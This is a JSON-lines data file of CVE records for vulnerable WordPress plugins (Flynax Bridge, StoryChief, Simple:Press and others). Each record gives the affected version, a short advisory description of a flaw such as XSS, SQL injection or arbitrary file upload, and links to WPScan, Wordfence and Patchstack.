{"CVE_ID":"CVE-2025-4179","slug":"flynax-bridge","versionImpact":"2.2.0","description":"The Flynax Bridge plugin for WordPress is vulnerable to limited Privilege Escalation due to a missing capability check on the registerUser() function in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to register new user accounts as authors.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/src\\\/API.php#L288\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/src\\\/API.php#L288\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2447cf4-0261-4ef2-98ec-98fa02dc8b87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2447cf4-0261-4ef2-98ec-98fa02dc8b87?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11502","slug":"planning-center-online-giving","versionImpact":"1.0.0","description":"The Planning Center Online Giving WordPress plugin through 1.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9bea52e-af32-449f-97b6-1dcfb2051bda\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9bea52e-af32-449f-97b6-1dcfb2051bda\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4954","slug":"axle-demo-importer","versionImpact":"1.0.3","description":"The Axle Demo Importer WordPress plugin through 1.0.3 does not validate files to be uploaded, which could allow authenticated users (author and above) to upload arbitrary files such as PHP on the server","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/673f35ff-e1d5-4099-86e7-8b6e3e410ef8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/673f35ff-e1d5-4099-86e7-8b6e3e410ef8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7649","slug":"surbma-recent-comments-shortcode","versionImpact":"2.0","description":"The Surbma | Recent Comments Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'recent-comments' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/surbma-recent-comments-shortcode\\\/tags\\\/2.0\\\/surbma-recent-comments-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/surbma-recent-comments-shortcode\\\/tags\\\/2.0\\\/surbma-recent-comments-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58e9c535-1b36-4795-b8f6-b38f3fc3d164?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58e9c535-1b36-4795-b8f6-b38f3fc3d164?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0043","slug":"custom-add-user","versionImpact":"2.0.2","description":"The Custom Add User WordPress plugin through 2.0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e012f23a-7daf-4ef3-b116-d0e2ed5bd0a3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e012f23a-7daf-4ef3-b116-d0e2ed5bd0a3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1020","slug":"wp-shoutbox-live-chat","versionImpact":"1.4.2","description":"The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4343","slug":"ulisting","versionImpact":"1.6.6","description":"The Unauthenticated Account Creation plugin for WordPress is vulnerable to Unauthenticated Account Creation in versions up to, and including, 1.6.6. This is due to the stm_listing_register AJAX action function being accessible and taking roles unprotected. This makes it possible for unauthenticated attackers to create accounts, even those with administrator privileges.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6bf45b-b02d-43bb-b682-7f1ae994e1d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6bf45b-b02d-43bb-b682-7f1ae994e1d3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4000","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click countdowns plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.6.2. This is due to missing or incorrect nonce validation on its AJAX actions. This makes it possible for unauthenticated attackers to create and delete countdowns, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffba592-6d0d-408f-89fa-079066750b0a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffba592-6d0d-408f-89fa-079066750b0a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3755","slug":"mf-gig-calendar","versionImpact":"1.2.1","description":"The MF Gig Calendar WordPress plugin through 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as editor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d34caeaf-2ecf-44a2-b308-e940bafd402c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d34caeaf-2ecf-44a2-b308-e940bafd402c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1798","slug":"tutor-lms-migration-tool","versionImpact":"2.2.0","description":"The Tutor LMS \u2013 Migration Tool plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the tutor_lp_export_xml function in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to export courses, including private and password protected courses.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cb67f55-6d21-4a4e-9651-fcf671788d16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cb67f55-6d21-4a4e-9651-fcf671788d16?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-migration-tool\\\/trunk\\\/classes\\\/LPtoTutorMigration.php#L762\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-migration-tool\\\/trunk\\\/classes\\\/LPtoTutorMigration.php#L762\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11447","slug":"peepso-core","versionImpact":"6.4.6.2","description":"The Community by PeepSo \u2013 Download from PeepSo.com plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018filter\u2019 parameter in all versions up to, and including, 6.4.6.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/templates\\\/activity\\\/activity-stream-filters.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/templates\\\/activity\\\/activity-stream-filters.php#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/templates\\\/activity\\\/activity-stream-filters-simple.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/templates\\\/activity\\\/activity-stream-filters-simple.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/trunk\\\/classes\\\/template.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/trunk\\\/classes\\\/template.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/049a36b1-4e24-4ac9-a594-9cabdc0dfe0f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/049a36b1-4e24-4ac9-a594-9cabdc0dfe0f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12028","slug":"friends","versionImpact":"3.2.1","description":"The Friends plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in all versions up to, and including, 3.2.1. This makes it possible for unauthenticated attackers to send arbitrary friend requests on behalf of another website, accept the friend request for the targeted website, and then communicate with the site as an accepted friend.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friends\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friends\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/980b16d4-3c4a-4ed1-af46-f39f3ec6dd19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/980b16d4-3c4a-4ed1-af46-f39f3ec6dd19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12440","slug":"candifly","versionImpact":"1.0.6","description":"The Candifly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'candifly' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/candifly\\\/trunk\\\/candifly.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/candifly\\\/trunk\\\/candifly.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/candifly\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/candifly\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf173ccd-23bc-49ec-92e0-032feae0fa4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf173ccd-23bc-49ec-92e0-032feae0fa4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13544","slug":"zarinpal-paid-downloads","versionImpact":"2.3","description":"The Zarinpal Paid Download WordPress plugin through 2.3 does not properly validate uploaded files, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91884263-62a7-436e-b19f-682b1aeb37d6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91884263-62a7-436e-b19f-682b1aeb37d6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-27265","slug":"google-maps-for-wordpress","versionImpact":"1.0.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aaron D. Campbell Google Maps for WordPress allows DOM-Based XSS. This issue affects Google Maps for WordPress: from n\/a through 1.0.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/google-maps-for-wordpress\\\/vulnerability\\\/wordpress-google-maps-for-wordpress-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/google-maps-for-wordpress\\\/vulnerability\\\/wordpress-google-maps-for-wordpress-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13574","slug":"xv-random-quotes","versionImpact":"1.40","description":"The XV Random Quotes WordPress plugin through 1.40 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eb9ef20-5d34-425e-b7fc-38a769d0a822\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eb9ef20-5d34-425e-b7fc-38a769d0a822\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eb9ef20-5d34-425e-b7fc-38a769d0a822\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eb9ef20-5d34-425e-b7fc-38a769d0a822\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4177","slug":"flynax-bridge","versionImpact":"2.2.0","description":"The Flynax Bridge plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the deleteUser() function in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to delete arbitrary users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/src\\\/API.php#L386\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/src\\\/API.php#L386\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcb33d02-d384-4dff-91e1-c49e86b97d6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcb33d02-d384-4dff-91e1-c49e86b97d6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11373","slug":"logs-de-connexion","versionImpact":"3.0.2","description":"The Connexion Logs WordPress plugin through 3.0.2 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9ef847f-3a3f-4030-828b-78db0044e142\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9ef847f-3a3f-4030-828b-78db0044e142\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4840","slug":"inprosysmedia-likes-dislikes-post","versionImpact":"1.0.0","description":"The inprosysmedia-likes-dislikes-post WordPress plugin through 1.0.0 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85dc579d-edc4-421e-9bb1-09629dec527b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85dc579d-edc4-421e-9bb1-09629dec527b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85dc579d-edc4-421e-9bb1-09629dec527b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85dc579d-edc4-421e-9bb1-09629dec527b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7441","slug":"story-chief","versionImpact":"1.0.42","description":"The StoryChief plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 1.0.42. This vulnerability occurs through the \/wp-json\/storychief\/webhook REST-API endpoint that does not have sufficient filetype validation. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/story-chief\\\/trunk\\\/includes\\\/tools.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/story-chief\\\/trunk\\\/includes\\\/tools.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/979efaa4-10f1-4c7f-b4b0-5a41678c9d66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/979efaa4-10f1-4c7f-b4b0-5a41678c9d66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4829","slug":"show-hidecollapse-expand","versionImpact":"1.2.5","description":"The Show-Hide \/ Collapse-Expand WordPress plugin through 1.2.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57e528ce-ec8c-4734-8903-926be36f91e7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57e528ce-ec8c-4734-8903-926be36f91e7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0899","slug":"wp-shoutbox-live-chat","versionImpact":"1.4.2","description":"The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before outputting it back in the Shoutbox, leading to Stored Cross-Site Scripting which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95f925f-118e-4fa1-8e8f-9dc1bc698f12\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95f925f-118e-4fa1-8e8f-9dc1bc698f12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3999","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click countdowns plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on its AJAX calls in versions up to, and including, 0.6.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to create and delete countdowns as well as manipulate other plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/293070c8-783f-404d-9250-392713703ce4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/293070c8-783f-404d-9250-392713703ce4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36706","slug":"simplepress","versionImpact":"6.6.0","description":"The Simple:Press \u2013 WordPress Forum Plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ~\/admin\/resources\/jscript\/ajaxupload\/sf-uploader.php file in versions up to, and including, 6.6.0. This makes it possible for attackers to upload arbitrary files on the affected site's server, which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53eba5b4-7cc0-48e1-bb9c-6ed3207151ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53eba5b4-7cc0-48e1-bb9c-6ed3207151ab?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-simple-press-wordpress-forum-arbitrary-file-upload-6-6-0\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-simple-press-wordpress-forum-arbitrary-file-upload-6-6-0\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-simplepress-plugin-fixed-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-simplepress-plugin-fixed-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27d4a8a5-9d81-4b42-92be-3f7d1ef22843\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27d4a8a5-9d81-4b42-92be-3f7d1ef22843\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3752","slug":"crelly-slider","versionImpact":"1.4.5","description":"The Crelly Slider WordPress plugin through 1.4.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e738540a-2006-4b92-8db1-2476374d35bd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e738540a-2006-4b92-8db1-2476374d35bd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5418","slug":"dethemekit-for-elementor","versionImpact":"2.1.4","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'slitems' attribute within the plugin's De Product Tab & Slide widget in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19bdbde1-1414-4113-890e-b6c96b8a6e11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19bdbde1-1414-4113-890e-b6c96b8a6e11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/tags\\\/2.1.4\\\/widgets\\\/de-product-tab-slide.php#L1617\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/tags\\\/2.1.4\\\/widgets\\\/de-product-tab-slide.php#L1617\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/tags\\\/2.1.0\\\/widgets\\\/de-product-tab-slide.php#L1619\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/tags\\\/2.1.0\\\/widgets\\\/de-product-tab-slide.php#L1619\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dethemekit-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dethemekit-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094885\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094885\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11440","slug":"grey-owl-lightbox","versionImpact":"1.6.1","description":"The Grey Owl Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gol_button' shortcode in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grey-owl-lightbox\\\/trunk\\\/functions\\\/functions.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grey-owl-lightbox\\\/trunk\\\/functions\\\/functions.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/grey-owl-lightbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/grey-owl-lightbox\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faf45a8d-1017-476e-8af9-2fbe250e8e19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faf45a8d-1017-476e-8af9-2fbe250e8e19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
